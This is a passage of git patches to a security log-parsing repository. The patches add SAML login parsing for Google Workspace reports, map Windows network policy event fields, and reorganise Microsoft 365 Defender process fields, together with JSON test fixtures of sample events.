"network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..e00c5ee79 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -28,6 +28,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_saml_fields + filter: '{{ json_event.message.id.applicationName == "saml"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -258,3 +260,21 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_saml_fields: + actions: + - set: + event.category: ["authentication"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["allowed"] + filter: '{{ json_event.message.events[0].name == "login_success"}}' + + - set: + event.type: ["denied"] + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json new file mode 100644 index 000000000..a96c1fab6 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success.json @@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..94e5f299f --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json @@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file From 49f05ead8e481396ef55f2e998ec6f1be38169d0 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 16:00:13 +0100 Subject: [PATCH 030/150] feat(Windows): copy CallingStationID as source ip or source mac and copy AuthenticationServer as destination domain --- Windows/windows/ingest/parser.yml | 13 +++++++++++++ Windows/windows/tests/Event_6272.json | 9 +++++++++ Windows/windows/tests/Event_6273.json | 9 +++++++++ Windows/windows/tests/process_6272.json | 13 +++++++++++++ 4 files changed, 44 insertions(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index f0bd6640b..c34ff2684 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -164,6 +164,8 @@ pipeline: - name: dns_fields - name: action_target - name: destination + - name: set_network_policy_fields + filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}" - name: rule - name: finalize @@ -1150,6 +1152,17 @@ stages: source.address: "{{json_event.message.SourceAddr}}" filter: "{{json.event.SourceAddr | is_ipaddress}}" + set_network_policy_fields: + actions: + - set: + source.ip: "{{ json.event.CallingStationID }}" + filter: "{{json.event.CallingStationID | is_ipaddress}}" + - set: + source.mac: "{{ json.event.CallingStationID }}" + filter: "{{ final.source.ip == null }}" + - set: + destination.domain: "{{ json.event.AuthenticationServer }}" + rule: actions: - set: diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json index 4a3212af2..20213504d 100644 --- a/Windows/windows/tests/Event_6272.json +++ b/Windows/windows/tests/Event_6272.json @@ -42,6 +42,14 @@ "record_id": 1674356873, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json index 8ad5a2226..118cf2445 100644 --- a/Windows/windows/tests/Event_6273.json +++ b/Windows/windows/tests/Event_6273.json @@ -42,6 +42,14 @@ "record_id": 783949626, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json index af1d9fe1d..3135f15c9 100644 --- a/Windows/windows/tests/process_6272.json +++ b/Windows/windows/tests/process_6272.json @@ -42,6 +42,11 @@ "record_id": 2324634, "type": "Security" }, + "destination": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "size_in_char": 7 + }, "host": { "hostname": "test", "name": "test" @@ -63,12 +68,20 @@ }, "related": { "hosts": [ + "1.2.3.4", "test" ], + "ip": [ + "10.24.25.25" + ], "user": [ "testUser" ] }, + "source": { + "address": "10.24.25.25", + "ip": "10.24.25.25" + }, "user": { "domain": "NT01", "id": "S-1-5-21-1111111111-111111111-1111111111-1111", From 7c47ee4ee8a16e39ece3021bd65f19304c722bc8 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 16:07:01 +0100 Subject: [PATCH 031/150] Apply linter --- Google Cloud/google-report/_meta/fields.yml | 24 +++++++++---------- Google Cloud/google-report/ingest/parser.yml | 6 ++--- .../tests/test_saml_login_success.json | 4 ++-- .../tests/test_saml_login_success_1.json | 4 ++-- 4 files changed, 19 insertions(+), 19 deletions(-) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ad86f9169..ad9d8d0a7 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -33,14 +33,14 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword -google.report.token.app_name: - description: Token authorization application name - name: google.report.token.app_name +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name type: keyword -google.report.token.type: - description: Token type - name: google.report.token.type +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator type: keyword google.report.saml.status_code: @@ -48,12 +48,12 @@ google.report.saml.status_code: name: google.report.saml.status_code type: keyword -google.report.saml.initiator: - description: SAML requester of saml authentication - name: google.report.saml.initiator +google.report.token.app_name: + description: Token authorization application name + name: google.report.token.app_name type: keyword -google.report.saml.application_name: - description: Saml SP application name - name: google.report.saml.application_name +google.report.token.type: + description: Token type + name: google.report.token.type type: keyword diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index e00c5ee79..3a0fce88f 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -269,12 +269,12 @@ stages: google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["allowed"] filter: '{{ json_event.message.events[0].name == "login_success"}}' - + - set: event.type: ["denied"] event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' - filter: '{{ json_event.message.events[0].name == "login_failure"}}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json index a96c1fab6..8a9785816 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success.json +++ b/Google Cloud/google-report/tests/test_saml_login_success.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json index 94e5f299f..de8e102d7 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success_1.json +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", From 462382e15fa0254cb24676a97571ed0edadafc82 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 13 Nov 2024 16:14:34 +0100 Subject: [PATCH 032/150] Fix/Microsoft 365 Defender: Fix on process* fields --- .../microsoft-365-defender/_meta/fields.yml | 264 ++++++++++-------- .../microsoft-365-defender/ingest/parser.yml | 150 +++++++--- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 100 +++++++ ...vents_2.json => test_device_events_2.json} | 13 +- ...test_device_events_get_clipboard_data.json | 83 ++++++ ...test_device_events_powershell_command.json | 83 ++++++ ..._device_events_shell_link_create_file.json | 103 +++++++ .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 109 ++++++++ .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_created.json | 8 +- .../tests/test_device_process_events.json | 83 +++--- .../tests/test_device_process_events_2.json | 127 ++++++--- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 13 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_post_delivery.json | 2 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_info_2.json | 2 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 54 ++-- 28 files changed, 1068 insertions(+), 392 deletions(-) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json rename Microsoft/microsoft-365-defender/tests/{test_deivce_events_2.json => test_device_events_2.json} (98%) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index f69ef372d..0e6154ccd 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -133,78 +133,6 @@ action.properties.ISP: name: action.properties.ISP type: keyword -action.properties.InitiatingProcessAccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.InitiatingProcessAccountObjectId - type: keyword - -action.properties.InitiatingProcessCommandLine: - description: Process commande Line that initiated the event - name: action.properties.InitiatingProcessCommandLine - type: keyword - -action.properties.InitiatingProcessFileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.InitiatingProcessFileSize - type: long - -action.properties.InitiatingProcessIntegrityLevel: - description: Integrity level of the process that initiated the event. Windows assigns - integrity levels to processes based on certain characteristics, such as if they - were launched from an internet download. These integrity levels influence permissions - to resources - name: action.properties.InitiatingProcessIntegrityLevel - type: keyword - -action.properties.InitiatingProcessLogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. - name: action.properties.InitiatingProcessLogonId - type: keyword - -action.properties.InitiatingProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the process that initiated the event - name: action.properties.InitiatingProcessTokenElevation - type: keyword - -action.properties.InitiatingProcessVersionInfoCompanyName: - description: Company name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoCompanyName - type: keyword - -action.properties.InitiatingProcessVersionInfoFileDescription: - description: Description from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoFileDescription - type: keyword - -action.properties.InitiatingProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoInternalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoOriginalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductName: - description: Product name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductVersion: - description: Product version from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductVersion - type: keyword - action.properties.IsAdminOperation: description: Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation @@ -353,51 +281,6 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword -action.properties.ProcessIntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.ProcessIntegrityLevel - type: keyword - -action.properties.ProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.ProcessTokenElevation - type: keyword - -action.properties.ProcessVersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.ProcessVersionInfoCompanyName - type: keyword - -action.properties.ProcessVersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.ProcessVersionInfoFileDescription - type: keyword - -action.properties.ProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoInternalFileName - type: keyword - -action.properties.ProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoOriginalFileName - type: keyword - -action.properties.ProcessVersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.ProcessVersionInfoProductName - type: keyword - -action.properties.ProcessVersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: action.properties.ProcessVersionInfoProductVersion - type: keyword - action.properties.Query: description: String used to run the query name: action.properties.Query @@ -529,6 +412,143 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword +action.properties.process.AccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.process.AccountObjectId + type: keyword + +action.properties.process.CommandLine: + description: Process commande Line that initiated the event + name: action.properties.process.CommandLine + type: keyword + +action.properties.process.FileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.process.FileSize + type: long + +action.properties.process.IntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.process.IntegrityLevel + type: keyword + +action.properties.process.LogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. + name: action.properties.process.LogonId + type: keyword + +action.properties.process.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.process.TokenElevation + type: keyword + +action.properties.process.VersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.process.VersionInfoCompanyName + type: keyword + +action.properties.process.VersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.process.VersionInfoFileDescription + type: keyword + +action.properties.process.VersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.process.VersionInfoInternalFileName + type: keyword + +action.properties.process.VersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.process.VersionInfoOriginalFileName + type: keyword + +action.properties.process.VersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.process.VersionInfoProductName + type: keyword + +action.properties.process.VersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: action.properties.process.VersionInfoProductVersion + type: keyword + +action.properties.process.parent.AccountObjectId: + description: Azure AD object ID of the user account that ran the parent process + responsible for the event + name: action.properties.process.parent.AccountObjectId + type: keyword + +action.properties.process.parent.CommandLine: + description: Parent process commande Line that initiated the event + name: action.properties.process.parent.CommandLine + type: keyword + +action.properties.process.parent.FileSize: + description: Size of the parent process (image file) that initiated the event + name: action.properties.process.parent.FileSize + type: long + +action.properties.process.parent.IntegrityLevel: + description: Integrity level of the parent process that initiated the event. Windows + assigns integrity levels to processes based on certain characteristics, such as + if they were launched from an internet download. These integrity levels influence + permissions to resources + name: action.properties.process.parent.IntegrityLevel + type: keyword + +action.properties.process.parent.LogonId: + description: Identifier for a logon session of the parent process that initiated + the event. This identifier is unique on the same machine only between restarts. + name: action.properties.process.parent.LogonId + type: keyword + +action.properties.process.parent.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the parent process that initiated the event + name: action.properties.process.parent.TokenElevation + type: keyword + +action.properties.process.parent.VersionInfoCompanyName: + description: Company name from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoCompanyName + type: keyword + +action.properties.process.parent.VersionInfoFileDescription: + description: Description from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoFileDescription + type: keyword + +action.properties.process.parent.VersionInfoInternalFileName: + description: Internal file name from the version information of the parent process + (image file) responsible for the event + name: action.properties.process.parent.VersionInfoInternalFileName + type: keyword + +action.properties.process.parent.VersionInfoOriginalFileName: + description: '' + name: action.properties.process.parent.VersionInfoOriginalFileName + type: keyword + +action.properties.process.parent.VersionInfoProductName: + description: '' + name: action.properties.process.parent.VersionInfoProductName + type: keyword + +action.properties.process.parent.VersionInfoProductVersion: + description: Product version from the version information of the parent process + (image file) responsible for the event + name: action.properties.process.parent.VersionInfoProductVersion + type: keyword + email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction @@ -821,6 +841,16 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: '' + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: '' + name: process.parent.user.email + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 2a8b6655f..f60d9b6f0 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -40,6 +40,10 @@ pipeline: input_field: "{{json_event.message.properties.RawEventData.Data}}" output_field: "data" - name: set_common_fields + - name: set_process_events + filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", 